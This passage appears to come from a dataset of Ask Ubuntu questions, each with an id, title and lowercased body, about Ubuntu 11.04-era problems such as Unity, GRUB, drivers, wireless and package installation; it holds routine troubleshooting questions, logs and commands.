38578	is the units policy still being drafted or is it finalised ?	https : //wiki.ubuntu.com/unitspolicy what i 'm really getting at here is : should i be filing bugs against applications that do not conform ? or is this policy not fully accepted/approved yet ?
38579	how do i restart an unity session from the terminal ?	the command for restarting gnome2 is : sudo /etc/init.d/gdm restart what is the equivalent for unity ?
38591	how to re-purpose a computer to be a nas type server ?	if someone could walk me through the setup process that would be cool . maybe you could just leave a simple list of each command i need to enter in the correct order to set this thing up ? here are the specs of one of the computers i want to re-purpose : sony vaio vgn-nr160e : cpu : intel core 2 duo @ 1.5ghz gpu : intel gm 965 express chipset ram : 1gb hdd : 160gb hitachi something-or-other ports : 4 usb 2.0 ports ; 1 firewire port ; some kind of express card slot ; vga port
38599	is there an application that randomly selects a wallpaper upon logging in ?	i was wondering if there is a program that would choose a wallpaper from a directory and set it as my desktop background automatically every time i log in . i 've already tried desktop drapes , the compiz wallpaper plug in ( from the extras package ) and wallpapoz , but those do n't seem to work . is there a script i can make that will do it for me ? i 'm running 11.04 official release . any help would be much appreciated .
38609	unity installed on one system , not on another	i downloaded ubuntu 11.04 and made a live usb , and installed ubuntu 11.04 using that usb on 2 computers . unity works perfect on one , but does not launch on another . also , the system on which unity does not run has better specifications .
38612	lenovo y560 wo n't boot unless it 's on ac power	i have a lenovo y560 and have installed ubuntu 11.04 ( 64 bit ) via wubi . when i start the notebook on battery , ubuntu hangs before the login screen . any workarounds ?
38613	strange window manager behaviour	i just upgraded to 11.04 and i 'm having some trouble with the window manager . when i log in there are no window borders around anything . also when i log in it is running some theme that looks like it was designed in the 90 's . but as soon as i bring up the `` appearance '' settings it flicks straight to the correct display theme : `` ambience '' without me changing anything ! ! still no window borders tho , and at this point the icons on the desktop have n't changed to conform with `` ambience '' they still look like something out of windows 95 : | compiz is running , gtk-window-manager is n't , i can run it manually where i do get borders , however the problem with the themes still remains . when i put a command to run gtk-window-manager in `` startup '' again it runs borders on startup , but the theme does the exact same thing . i am using on board intel graphics , i know they have a bad reputation with linux : \ vga compatible controller : intel corporation 82g965 integrated graphics controller ( rev 02 ) also tried creating a new user account for test purposes and there was no problems with the theme in the new user account . still no borders tho . the problem with borders was fixed in edit 3 re-installing unity does n't fix anything . edit : problem half solved using the ham-handed approach of re-installing natty . i have window borders permanently now thank god ! but when i log in at first my theme is still like windows 95 , despite the fact i have it set to 'ambience ' , it stays like this until i go into 'appearance ' where it automatically changes to the correct theme without me actually doing anything ! everything reverts back to 'ambience ' apart from icons on the desktop which still look ancient . here 's the link to a screenshot of the problem :
38616	where & how to edit very large video files ?	question : does anyone know of a good workflow for editing large video files via avidemux , blender , openshot , kdenlive and/or similar programs ? backstory : i shot a 2hr debate on my canon 550d which resulted in 16 video files of hd 1080p quality , since the sd cards put a 4gb size limit on the length of a single shot . these hd files contain b-frames , which makes it quite hard to edit them because scrubbing the timeline goes all jittery . using avidemux , i 've experimented with various codecs : huffyuv , h.264 , ffv1 and ffvhuff . the container format mainly being .avi , and turning `` create opendml files '' made it possible to create huge .avi files . earlier i had briefly tried my hand at using .mkv files , but avidemux kept crashing . my plan was to import the resulting lossless files into blender , kdenlive or openshot , and it seems that ffvhuff was the only codec that made it possible to move around the timeline in a decent way ( at least in blender ) . however that was using smaller .avi files . just now i tried bunching together five of the original files into a large 40gb .avi file encoded with the ffvhuff codec . i was n't able to edit the resulting file in blender nor openshot . the program would just hang if i jumped to far out into the timeline and try to play the video . so , yeah . my question is at the top . any assistance , greatly appreciated .
38617	root filesystem check fails after power failure during installation	during the `` install '' phase of the upgrade there was a power failure . after when starting up again the following errors are reported : init : udevtrigger main process ( 420 ) terminated with status 1 init : udevtrigger post-stop process ( 428 ) terminated with status 1 init : udevmonitor main process ( 419 ) killed by term signal the disk drive for / is not ready yet or not present continue to wait ; or press s to skip mounting or m for manual recovery pressing m gives me the following message : root filesystem check failed . a maintenance shell will now be started . control-d will terminate this shell and reboot the system .
38618	is there a way to include nvidia drivers before installation ?	my laptop hates nouveau , and to save me the bother of upgrading from 10.04 to 11.04 ( as i did with 10.10 ) i was wondering if there was a way to modify an ubuntu iso to run on the nvidia drivers instead of having t to install them afterwards . i do n't really want to switch to mint , as i do love unity . so , is there a way for me to get/create an iso with the nvidia drivers already installed and active ? edit : livecd system wo n't boot with nouveau , and installing through alternate or any other method results in nouveau being activated after installation , leaving me with a black screen , aside from the cursor . hence why i 'm asking about getting the nvidia drivers up and running .
38620	my system takes too long to boot is there a fix ?	i just installed ubuntu 11.04 fresh install with windows 7 already installed.. when i chose ubuntu from the grub menu it shows the purple screen for too long with no activity from the laptop then after a while it boots normally . is there a fix for that because really it takes tooooooo long . dmesg reports the following : [ 3.078617 ] ip route cache hash table entries : 131072 ( order : 8 , 1048576 bytes ) [ 3.080423 ] tcp established hash table entries : 524288 ( order : 11 , 8388608 bytes ) [ 3.084959 ] tcp bind hash table entries : 65536 ( order : 8 , 1048576 bytes ) [ 3.085502 ] tcp : hash tables configured ( established 524288 bind 65536 ) [ 3.085506 ] tcp reno registered [ 3.085524 ] udp hash table entries : 2048 ( order : 4 , 65536 bytes ) [ 3.085576 ] udp-lite hash table entries : 2048 ( order : 4 , 65536 bytes ) [ 3.085736 ] net : registered protocol family 1 [ 150.340039 ] pci 0000:00:13.5 : ehci : bios handoff failed ( bios bug ? ) 01010001 [ 150.340069 ] pci : cls mismatch ( 64 ! = 32 ) , using 64 bytes [ 150.340088 ] pci 0000:01:05.0 : boot video device [ 150.340698 ] pci-dma : disabling agp . [ 150.340825 ] pci-dma : aperture base @ cc000000 size 65536 kb [ 150.340827 ] pci-dma : using gart iommu . [ 150.340831 ] pci-dma : reserving 64mb of iommu area in the agp aperture [ 150.344449 ] simple boot flag at 0x44 set to 0x1 [ 150.344892 ] audit : initializing netlink socket ( disabled ) [ 150.344906 ] type=2000 audit ( 1304603463.330:1 ) : initialized
38621	messaging menu keyboard shortcut	in previous versions of ubuntu , super+m would open the messaging menu . in 11.04 , the super key is captured by the launcher . i have yet to find a way to quickly open the messaging menu from the keyboard .
38626	how do i install the col command ?	i 've tried installing col on ubuntu linux : sudo apt-get install col but i get the error : e : could n't find package col what 's the best way to install col on ubuntu ?
38630	lock screen causes screensaver to crash , session freezes	whenever the screen is locked ( either by menu or by switching users ) , bug buddy show up saying the screensaver has crashed , then the entire session freezes up and ca n't do anything . it must be killed with ctrl+alt+backspace . when the screensaver control panel is opened the same error occurs , but it does n't freeze and i can save it . system : linux 2.6.38-8-generic-pae # 42-ubuntu smp mon apr 11 05:17:09 utc 2011 i686 x vendor : the x.org foundation x vendor release : 11001000 selinux : no accessibility : disabled gtk+ theme : human icon theme : humanity gtk+ modules : gnomesegvhandler , canberra-gtk-module memory status : size : 20008960 vsize : 20008960 resident : 6086656 share : 4497408 rss : 6086656 rss_rlim : 18446744073709551615 cpu usage : start_time : 1304204561 rtime : 1 utime : 1 stime : 0 cutime:0 cstime : 0 timeout : 0 it_real_value : 0 frequency : 100 -- -- -- -- -- - .xsession-errors -- -- -- -- -- -- -- -- -- -- - ** ( gnome-session:26986 ) : debug : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerchanged ** ( gnome-session:26986 ) : debug : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerchanged ** ( gnome-session:26986 ) : debug : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerchanged ** ( gnome-session:26986 ) : debug : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerchanged ** ( gnome-session:26986 ) : debug : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerchanged ** ( gnome-session:26986 ) : debug : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerchanged ** ( gnome-session:26986 ) : debug : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerchanged ** ( gnome-session:26986 ) : debug : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerchanged ** ( gnome-session:26986 ) : debug : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerchanged ** ( gnome-session:26986 ) : debug : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerchanged ** ( gnome-session:26986 ) : debug : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerchanged ** ( gnome-session:26986 ) : debug : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerchanged ** ( gnome-session:26986 ) : debug : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerchanged ** ( gnome-session:26986 ) : debug : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerchanged ** ( gnome-session:26986 ) : debug : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerchanged -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- this means that anyone who uses this computer will have to log out before anyone else can log in . this is a serious problem . setting the screensaver to `` blank screen '' does not solve the problem .
38632	ring switcher in unity - mouse combinations do n't work	i asked this question ring switcher in unity for knowing , do ring switchers work in unity ? as answered there it works but only with keyboard shortcuts . i am able to use alt+tab combination but right edge + mouse clicks ( i configured it that way ) did not work . how can i set this right ? most of the times i work with mouse and this option is really handy for me .
38634	grub/burg hates windows 7	every time i try to access my windows 7 partition from burg , i get a `` required device is not installed '' error with an error code of 0xc000000f . the same thing happens in normal grub . i am on natty and on a dell system ( the burg wiki mentioned something about dells ) . my other partition is windows 7 sp1 and was installed before natty .
38635	how do i whitelist adobe air applications in the panel ?	i know that for an application to show up in the systray i have to add it to the list using this command : gsettings set com.canonical.unity.panel systray-whitelist followed by a list of the applications . how can i add adobe air applications like tweetdeck to the list ? i tried using : gsettings set com.canonical.unity.panel systray-whitelist `` [ 'javaembeddedframe ' , 'wine ' , 'tucan ' , 'skype ' , 'hp-systray ' , 'adobeair ' , 'tweetdeck ' ] '' but it does n't work .
38644	is there a tablet version of ubuntu coming up ?	unity seems very touch friendly : large icons , high contrast etc . could it be possible to see it on the tablet market ? since it 's very hardware friendly ( last i checked , some ubuntu distros actually require less hardware power than android ) and open , it could provide a superior tablet at an inferior cost . oh and it would get the ubuntu name out there !
38646	how to enable dual monitor with an ati radeon x300 card ?	i am trying to enable dual monitor for my ubuntu 11.04 and ati radeon x300 video card . here is the information about my monitors : $ sudo lshw -c display *-display:0 description : vga compatible controller product : rv370 5b60 [ radeon x300 ( pcie ) ] vendor : ati technologies inc physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:47 memory : ec000000-edffffff memory : efde0000-efdeffff ioport : dc00 ( size=256 ) memory : efe00000-efe1ffff *-display:1 unclaimed description : display controller product : rv370 [ radeon x300se ] vendor : ati technologies inc physical id : 0.1 bus info : pci @ 0000:01:00.1 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress bus_master cap_list configuration : latency=0 resources : memory : efdf0000-efdfffff and the video card $ lspci -nn | grep vga 01:00.0 vga compatible controller [ 0300 ] : ati technologies inc rv370 5b60 [ radeon x300 ( pcie ) ] [ 1002:5b60 ] i tried to find documentation online but had no luck .
38648	ca n't upload to ubuntu one	i was able to upload to ubuntu one for a while , then i limited the download and upload speed , then upload stopped working . i tried unlimiting , but i still ca n't upload . is there anything i can do ?
38651	is it possible for ubuntu to run android and iphone apps ?	both android and ( too some extent ) ios use .deb files . while the phone versions of the apps may be impossible to use , but could the tablet versions be converted ? one of the reasons my friend keeps giving me against ubuntu and linux in general is the lack of really good software . if we could tap into the android apps though , it would really open up possibilities ! if you use a jailbroken iphone , you 'll notice that all cydia apps are in the .deb form . and yeah , i 'm aware that there is really great software for linux , but sometimes i feel it lacks , especially in the gaming section ( fingers crossed for openmorrowind ) . imagine being able to run angry birds , fruit ninja and plants vs zombies natively on ubuntu . or , imagine some of the great ipad apps like dragon dictation or heck , even infinity blade ! the possibilities would be endless .
38652	grub problem after installation of 11.04	i upgraded to 11.04 from 10.10 yesterday on a dual boot on a desktop system with vista . everything was acting fine until the upgrade . the upgrade appeared to be running properly and i went to do something and when i came back , the screen was black and i could n't get any response from the pc . i reset the sytem . here is the problem , on boot the grub menu appears normally ( but with the 10.10 system displayed instead of 11.04 ) i can select the vista os and the system starts normally . if i select the ubuntu os , i eventually get the following error : init : udevtrigger main process ( 448 ) terminated with status 1 init : udevtrigger post-stop process ( 452 ) terminated with status 1 init : udevmonitor main process ( 447 ) killed by term signal the disk drive for / is not ready or not present continue to wait ; or press s to skip mounting or m for manual recovery '' all partitions are recognized by fsck -l. i tried to boot from a live cd of 11.04 , but i keep being sent to the grub menu . can someone help me get past this hiccup ? it seems that grub did n't update and just needs to be directed where to look for linux package . i am just learning about linux , but am willing to put some time into it . i just need some direction . thanks !
38653	why is banshee crashing on launch in 10.04.2 ?	i have downgraded to ubuntu 10.04.2 lts for stability and i just installed banshee through the software center . i do n't have any banshee plugins installed . when i try to open banshee i just get this error : an unhandled exception was thrown : could not read add-in description at mono.addins.addin.get_description ( ) [ 0x00000 ] at mono.addins.addinsessionservice.checkhostassembly ( system.reflection.assembly asm ) [ 0x00000 ] at mono.addins.addinsessionservice.activateroots ( ) [ 0x00000 ] at mono.addins.addinsessionservice.initialize ( ) [ 0x00000 ] at mono.addins.addinmanager.initialize ( system.string configdir ) [ 0x00000 ] at banshee.servicestack.servicemanager.initializeaddins ( ) [ 0x00000 ] at banshee.servicestack.servicemanager.defaultinitialize ( ) [ 0x00000 ] at banshee.servicestack.application.initialize ( ) [ 0x00000 ] at banshee.gui.gtkbaseclient.initialize ( boolean registercommonservices ) [ 0x00000 ] at banshee.gui.gtkbaseclient..ctor ( boolean initializedefault , system.string defaulticonname ) [ 0x00000 ] at banshee.gui.gtkbaseclient..ctor ( ) [ 0x00000 ] at nereid.client..ctor ( ) [ 0x00000 ] at ( wrapper managed-to-native ) system.reflection.monocmethod : internalinvoke ( object , object [ ] , system.exception & ) at system.reflection.monocmethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] exception has been thrown by the target of an invocation . at system.reflection.monocmethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] at system.reflection.monocmethod.invoke ( bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] at system.reflection.constructorinfo.invoke ( system.object [ ] parameters ) [ 0x00000 ] at system.activator.createinstance ( system.type type , boolean nonpublic ) [ 0x00000 ] at system.activator.createinstance ( system.type type ) [ 0x00000 ] at banshee.gui.gtkbaseclient.startup ( ) [ 0x00000 ] at hyena.gui.cleanroomstartup.startup ( hyena.gui.startupinvocationhandler startup ) [ 0x00000 ] .net version : 2.0.50727.1433 os version : unix 2.6.32.31 assembly version information : system.xml ( 2.0.0.0 ) system.core ( 3.5.0.0 ) gdk-sharp ( 2.12.0.0 ) mono.addins ( 0.4.0.0 ) atk-sharp ( 2.12.0.0 ) hyena.gui ( 1.6.0.0 ) gtk-sharp ( 2.12.0.0 ) banshee.core ( 1.6.0.0 ) banshee.thickclient ( 1.6.0.0 ) nereid ( 1.6.0.0 ) ndesk.dbus.proxies ( 0.0.0.0 ) mono.posix ( 2.0.0.0 ) system ( 2.0.0.0 ) hyena ( 1.6.0.0 ) ndesk.dbus ( 1.0.0.0 ) glib-sharp ( 2.12.0.0 ) banshee.services ( 1.6.0.0 ) banshee ( 1.6.0.0 ) mscorlib ( 2.0.0.0 ) platform information : linux 2.6.32-31-generic-pae i686 unknown gnu/linux disribution information : [ /etc/lsb-release ] distrib_id=ubuntu distrib_release=10.04 distrib_codename=lucid distrib_description= '' ubuntu 10.04.2 lts '' [ /etc/debian_version ] squeeze/sid here is the terminal output . immediately after this , a dialog box pops up giving me the same error as i pasted above . thomas @ thomas-m15x : ~ $ banshee [ info 21:02:07.481 ] running banshee 1.6.1 : [ ubuntu 10.04 lts ( linux-gnu , i486 ) @ 2010-06-18 09:51:55 utc ] exception has been thrown by the target of an invocation . system.reflection.targetinvocationexception : exception has been thrown by the target of an invocation . -- - > system.invalidoperationexception : could not read add-in description at mono.addins.addin.get_description ( ) [ 0x00000 ] at mono.addins.addinsessionservice.checkhostassembly ( system.reflection.assembly asm ) [ 0x00000 ] at mono.addins.addinsessionservice.activateroots ( ) [ 0x00000 ] at mono.addins.addinsessionservice.initialize ( ) [ 0x00000 ] at mono.addins.addinmanager.initialize ( system.string configdir ) [ 0x00000 ] at banshee.servicestack.servicemanager.initializeaddins ( ) [ 0x00000 ] at banshee.servicestack.servicemanager.defaultinitialize ( ) [ 0x00000 ] at banshee.servicestack.application.initialize ( ) [ 0x00000 ] at banshee.gui.gtkbaseclient.initialize ( boolean registercommonservices ) [ 0x00000 ] at banshee.gui.gtkbaseclient..ctor ( boolean initializedefault , system.string defaulticonname ) [ 0x00000 ] at banshee.gui.gtkbaseclient..ctor ( ) [ 0x00000 ] at nereid.client..ctor ( ) [ 0x00000 ] at ( wrapper managed-to-native ) system.reflection.monocmethod : internalinvoke ( object , object [ ] , system.exception & ) at system.reflection.monocmethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] -- - end of inner exception stack trace -- - at system.reflection.monocmethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] at system.reflection.monocmethod.invoke ( bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] at system.reflection.constructorinfo.invoke ( system.object [ ] parameters ) [ 0x00000 ] at system.activator.createinstance ( system.type type , boolean nonpublic ) [ 0x00000 ] at system.activator.createinstance ( system.type type ) [ 0x00000 ] at banshee.gui.gtkbaseclient.startup ( ) [ 0x00000 ] at hyena.gui.cleanroomstartup.startup ( hyena.gui.startupinvocationhandler startup ) [ 0x00000 ] i have no idea why it 's doing this . `` could not read add-in description . '' if it 's referring to third-party extensions , then once again , i do n't have any installed . any help would be appreciated .
38657	ubuntu one progress bar not being shown	i did a fresh install of natty today , and found that the ubuntu one launcher was n't showing a progress bar for uploads/downloads . how can i get this back ?
38659	making blackberry act as modem and connecting to internet	i have tried and tried to no avail ... i have downloaded berry4all and ca n't connect . is there anyone who knows step by step how to connect ? even the help in ubuntu points me in the wrong direction . thanks in advance .
38661	how do i run .sh files in terminal ?	whenever i open a .sh file , it opens it in gedit instead of the terminal . i ca n't find any option similar to right click → open with → other application ... → terminal . how do i open this file in the terminal ?
38662	installing gearman on 10.04	i 'm trying to install gearman on a clean out of the box 10.04 server using the following commands : sudo apt-key adv -- recv-keys -- keyserver keyserver.ubuntu.com sudo apt-get update sudo apt-get install gearman-job-server libgearman2 libgearman-dev uuid-dev php5-dev sudo pecl install channel : //pecl.php.net/gearman-0.7.0 i 've added the following to my /etc/apt/sources.list : deb http : //ppa.launchpad.net/gearman-developers/ppa/ubuntu lucid main but i get the following error after i run the apt-get install : reading package listsâś done building dependency tree reading state informationâś done uuid-dev is already the newest version . php5-dev is already the newest version . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gearman-job-server : depends : libdrizzle1 ( > = 2010.10.01 ) but it is not installable e : broken packages any help would be greatly appreciated . update : it seems i was able to install libdrizzle with the following instructions : sudo apt-add-repository ppa : drizzle-developers/ppa sudo apt-get update sudo apt-get install libdrizzle1 after this i was able to install gearman , however , i was unable to install the pecl module . the module seems to be no longer supported . i was able to install it like this : wget http : //pecl.php.net/get/gearman-0.7.0.tgz tar -xvfz gearman-0.7.0.tgz cd gearman-0.7.0 ./configure make sudo make install more information on this page : http : //gearman.org/index.php ? id=gearman_php_extension
38663	wireless network disabled on a broadcom 4312	after installing ubuntu 11.04 , my network has become disabled . here is the output oflshw in terminal : *-network disabled description : wireless interface product : bcm4312 802.11b/g lp-phy vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth1 version : 01 serial : 00:21:00:58:65:5f width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=5.100.82.38 latency=0 multicast=yes wireless=ieee 802.11bg resources : irq:17 memory : d4600000-d4603fff
38667	network really slow with tl-wn951n wireless card	i literally just installed ubuntu and it seems to be working great except the network is deadly slow . i 'm running a tl-wn951n wireless card which can download at about 600-700 kb/s in windows but in ubuntu the max speed it seems to get is around 5kb/s . i guess i should note that my wap is only wireless-g but like i said , i can get much better speeds in windows . i 'm testing the speeds by downloading files from here : http : //mirror.internode.on.net/pub/test/ anyone have any idea ? i saw some people recommend downloading drivers and compiling them myself but i 'm really really new to all of this so would appreciate someone babying me through it so i do n't brick my computer ! here are the results of lspci -v : 04:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 02 ) subsystem : giga-byte technology ga-ep45-ds5 motherboard flags : bus master , fast devsel , latency 0 , irq 44 i/o ports at c000 [ size=256 ] memory at e9110000 ( 64-bit , prefetchable ) [ size=4k ] memory at e9100000 ( 64-bit , prefetchable ) [ size=64k ] [ virtual ] expansion rom at e9120000 [ disabled ] [ size=64k ] capabilities : < access denied > kernel driver in use : r8169 kernel modules : r8169 05:02.0 network controller : atheros communications inc. ar5008 wireless network adapter ( rev 01 ) subsystem : atheros communications inc. device 3071 flags : bus master , 66mhz , medium devsel , latency 168 , irq 18 memory at e9200000 ( 32-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : ath9k kernel modules : ath9k
38668	winetricks ca n't read cd when installing game	i am attempting to install knights of the old republic using the winetricks wizard , and i keep getting stuck with a dialog which says `` wrong disk inserted , not found '' . however , i have my kotor disk inserted and can see it fine in nautilus . when i put a different disk in the drive , it says : `` please insert and mount ... '' , so i know it has identified the correct disk : the other huge annoyance is that the window endless loops on me when i click `` ok '' , so i could sit here forever clicking it and get no where . any ideas what is wrong , and/or what i can do to get this install working ? versions : ubuntu 11.04 x64bit valorin @ thorin : ~ $ wine -- version wine-1.3.18 valorin @ thorin : ~ $ winetricks -- version 20110417
38672	how to automate the following task ?	daily i wan na copy some files from a remote system and i have to put all those files in on a folder on that date say .is it possible to automate this task ? what we do presently is we log on to the remote machine through vnc and we go to the preferred location and copy those files and put it on a folder.if some day we forget this we wont be able to take records for that day coz the files will be overwritten.so i would like to automate this task , is it possible ? can someone help me please.thanks in adavance.. note : the remote system runs windows xp professional
38677	how do i remap the keyboard shortcut for gnome do ?	i am giving unity a chance to win me over in natty , but i admit i am a heavy gnome do user and unity has remapped the super+space keyboard shortcut to show the unity launcher . i am not yet convinced with the new unity launcher and would like to keep using gnome do , at least until such time as i am convinced that the unity launcher is as frictionless as gnome do . is it possible to remap it to gnome do ?
38680	how to hide vnc notification ?	when ever i access a windows machine through vnc from ubuntu the icon changes and notifies the user that someone is logged into the system . is it possible to hide that notification ?
38681	set encrypted home passphrase	i just reinstalled ubuntu , natty . i set to use encrypted home , but once the system was running , i was asked to define the encrypted home passphrase . out of haste , i skipped that , but now i want to define the passphrase but i could n't find out how ( despite how trivial this sounds ) . i set my /home to a specific partition , so i may reinstall ubuntu without losing my data whenever i need it , and i guess this is the passphare that i 'd need to supply to recover my data on a new install , am i right ? please , how can i define/change my passphrase ?
38684	why does n't document viewer appear in the dash as an installed application ?	document viewer is part of the 11.04 release , yet it does not appear in the dash anywhere . it is installed , but it can not be found by a search when in the dash and it does not appear as an installed application . what other preinstalled applications are missing from the dash and why was the dash made so difficult to customize ?
38685	do i really need ati proprietary drivers ?	ever since i installed 11.04 , i have problems with ati . if i do n't enable it , am i still able to use hdmi with no problems ?
38686	unable to connect to hidden ssid	i just installed ubuntu 11.04 on my hp mini 110 , but unfortunately i 'm unable to connect to hidden ssid while it works fine with non hidden wireless . the wireless device is ralink rt3090 . can anyone help me ?
38687	need script to turn compiz window decoration plugin off , start a program , then turn decorations on again	i have a program , vuescan , which i use with my flatbed scanner . it works fine up to ubuntu 10.10 ( 64bit ) , but in ubuntu 11.04 ( 64 bit ) , the vuescan window does not launch under unity or in classic mode or in classic mode - no effects . it does run normally in safe mode . i discovered through trial and error that if i turn off the window decoration plugin in compiz ( via the ccsm ) , vuescan starts normally and opens its gui window . i can then turn window decorations back on via the ccsm and everything works ok with the window decorations , including vuescan . as a workaround until either vuescan is fixed or the compiz/unity window decorator is fixed , i would like to start vuescan with a script , bash preferably , that would first turn off window decorations , then start vuescan ( this part is easy and i know how to do it ) , and then turn window decorations back on . i 'm not familiar enough with compiz and how to communicate with it via dbus , specifically as it is implemented in ubuntu 11.04 , to be able to do this script on my own . any help much appreciated !
38688	will libreoffice advance ahead of open office eventually ?	examining the differences between libreoffice and open office and trying to understand what it 's all about , would it be correct to assume that libreoffice will eventually be overtaking open office in their advancement as both projects advance from the forking point as a result of simply the variety and number contributing ?
38690	how do i downgrade my kernel ?	my wifi used to work very well on ubuntu 10.04 with kernel 2.6.32.28 . now after i installed ubuntu 11.04 with the lastest kernel , my wifi ( rt3090 ) not working anymore . is it safe to downgrade the kernel ? , if so , how to downgrade it ?
38692	how does one remove applications installed through `` python setup.py install '' ?	i have two applications that i attempted to install , but they did n't work and now i ca n't get rid of them . they were both installed through sudo python setup.py install so there are n't any actual package files that i can remove from synaptic/software center . niether of the readme files say anything about uninstalling and trying sudo python setup.py uninstall ( as someone suggested ) did n't work . is there another way to get rid of these applications ? using 11.04 , if that helps
38697	where are the unity images located , can i access them ?	i wan na theme ubuntu unity on natty narwhal but i do n't know where they are or if i can even do this . like the transparent background , icons , all of it .
38698	how do i downgrade from 11.04 to 10.10 ?	i installed ubuntu 11.04 , do n't like it , ca n't get the classic desktop back , ca n't spend any more time on it , and want to get version 10 back . is there a way to downgrade from 11.04 to 10 ?
38703	an unresolvable problem occurred while calculating the upgrade , how to solve it ?	i 'm on maverick , and want to upgrade to natty . i went to update manager and clicked upgrade . while it 's calculating upgrade an error appeared : what should i do now ? edit : i also try upgrade from ubuntu alternate cd , but getting same error !
38707	so far , no updates for natty in repos ?	okay , i 'm just a bit nervous . since i updated from maverick to natty , i did n't download any updates . yes , now the third day goes after stable release and so far update-manager has n't found or downloaded any updates . is that for real ? i 'm wondering because even for 10.10 still some updates are coming on a daily basis . and for fresh and not-enough-stable release there are no updates for almost three days ? tell me that there 's nothing wrong with my update-manager and there has n't been any updates indeed .
38708	firefox 3.6 in ubuntu 11.04	is there any way to install firefox 3.6 in ubuntu 11.04 ? i need firefox 3.6 because firefox 4 does not support google gears which is required for offline gmail and google explicitly stated that they are not going to update gears for firefox 4 .
38712	as i ca n't use unity ( 2d or 3d ) , is there any reason to use 11.04 over 10.04 ?	as i ca n't use unity ( 2d or 3d ) , is there any reason to use 11.04 over 10.04 ? see my previous question : installed unity 2d on 11.04 , not showing in the login screen ? only difference i can see is libre office , banshee music player . anything else ?
38719	ca n't play wmv files	64 bit ubuntu can not play wmv files . how can i fix it ? i installed w64codecs but it did n't work . thanks .
38727	can i rearrange unity lenses on the launcher ?	is it possible to reorder unity 2d lenses ? i have several installed , and i want them in a different order on the launcher .
38729	wine wo n't run any .exe programs that are installed on other drives	whit 10.10 i did't had this problem i was able to run programs from my windows drive through wine by just double-clicking or selecting run by wine , but in 11.04 when i run program this way it says : the file '/media/drive/software/games/borderlands/gearbox software/borderlands/binaries/borderlands.exe ' is not marked as executable . if this was downloaded or copied from an untrusted source , it may be dangerous to run . for more details , read about the executable bit . and i try changing permissions of file to be executable but it keeps changing back every time i change it i read that it 's blocked because of windows viruses but i 'm sure that this files are safe and i can run them safely but now how can i change it . thanks .
38730	ubuntu hangs while working	i have installed ubuntu lucid in my machine with windows.ubuntu hangs even when there is no activity.i could not start any application.it hangs only in gui mode.do you need more information ? any help would be appreciated ? intel dual core 3.ghz intel motherboard 160gb hdd 2 gb ddr2 ram i m using onboard graphics intel 82945g express chipset.no external graphic card
38733	how to read dbus-monitor output ?	i 'm playing around with dbus-monitor to try and understand how dbus is working in ubuntu environment . i have several questions in this regard : could you please let me know how to read the following properly ? i understand the big idea , but not the details . signal sender=:1.1948 - > dest= ( null destination ) serial=1829990 path=/org/ayatana/menu/da00003 ; interface=org.ayatana.dbusmenu ; member=itempropertyupdated int32 23 string `` enabled '' variant boolean true method call sender=:1.6 - > dest=org.freedesktop.notifications serial=1399 path=/org/freedesktop/notifications ; interface=org.freedesktop.notifications ; member=getcapabilities i get that the first one is a signal whereas the second is a method . does destination mean there can be a specific receiver/slot for a signal ? what 's a member ? and are the items of the list following the signal the arguments passed in the signal ? what are sender and serials ? i noticed something about the relationship between volume-control and notifications . from what i read from the dbus-monitor output method call sender=:1.6 - > dest=org.freedesktop.notifications serial=1400 path=/org/freedesktop/notifications ; interface=org.freedesktop.notifications ; member=notify string `` gnome-settings-daemon '' uint32 0 string `` notification-audio-volume-medium '' string `` `` string `` '' array [ ] array [ dict entry ( string `` value '' variant int32 38 ) dict entry ( string `` x-canonical-private-synchronous '' variant string `` volume '' ) ] int32 -1 it seems that the notification is triggered by its method . i just do n't really understand why it works this way . in my view it would make more sense if there was a signal emitted `` 